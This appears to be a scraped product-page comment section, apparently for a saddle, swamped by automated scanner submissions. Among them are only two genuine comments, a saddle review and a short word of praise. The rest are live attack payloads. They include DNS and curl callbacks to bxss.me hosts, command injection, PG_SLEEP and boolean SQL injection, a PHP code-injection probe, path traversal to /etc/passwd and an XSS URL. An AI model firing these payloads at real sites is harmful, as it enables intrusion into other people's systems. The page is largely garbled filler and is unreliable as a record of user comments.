XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
bxss.me/t/xss.html?%00
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     ".gethostbyname(lc("hithg"."obfpwdkded4a5.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(69).chr(109).chr(76)." |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
../../../../../../../../../../../../../../windows/
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     ../../../../../../../../../../../../../../etc/passwd |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     gethostbyname(lc('hitub'.'blzacebma405f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(72).chr(112).chr(90) |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
VlR2bHFLVE8=
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
gethostbyname(lc('hittr'.'bzvnhviaa982f.bxss.me.')
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     ulzA6nXz: 4m8IetOI |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
".gethostbyname(lc("hitxt"."indbawdz966b7.bxss.me.
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     !(()&&!|*|*| |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
Zaiyah
     Very valid, pithy, sucincct, and on point. WD. |
XcwJRDFY
    
|
XcwJRDFY
     &(nslookup -q=cname hitlbrpedcrxo624c3.bxss.me||curl hitlbrpedcrxo624c3.bxss.me)&'\"`0&(nslookup -q=cname hitlbrpedcrxo624c3.bxss.me||curl hitlbrpedcrxo624c3.bxss.me)&`' |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     ${@print(md5(31337))} |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
Linda
     Bought one of these saddles in 2012 because I have back problems. I really love this saddle. It is well made and very, very comfortable. Since it sits down on the horse's back there is less shock on my spine from a hard tree, like most saddles. |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     "+"A".concat(70-3).concat(22*4).concat(117).concat(83).concat(115).concat(86)+(require"socket"
Socket.gethostbyname("hitdm"+"xhmaybzye7d1f.bxss.me.")[3].to_s)+" |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
&echo gqmxhn$()\ pgnpui\nz^xyu||a #' &echo gqmxhn$
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY1UnhY74a' OR 286=(SELECT 286 FROM PG_SLEEP
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     products.aspx |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
-1 OR 2+10-10-1=0+0+0+1
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
     'A'.concat(70-3).concat(22*4).concat(105).concat(80).concat(114).concat(65)+(require'socket'
Socket.gethostbyname('hitbc'+'wnheibct5ae42.bxss.me.')[3].to_s) |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
products.aspx
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
-1)) OR 292=(SELECT 292 FROM PG_SLEEP(15))-- |
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
|echo husnby$()\ pdrdck\nz^xyu||a #' |echo husnby$
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|
XcwJRDFY
    
|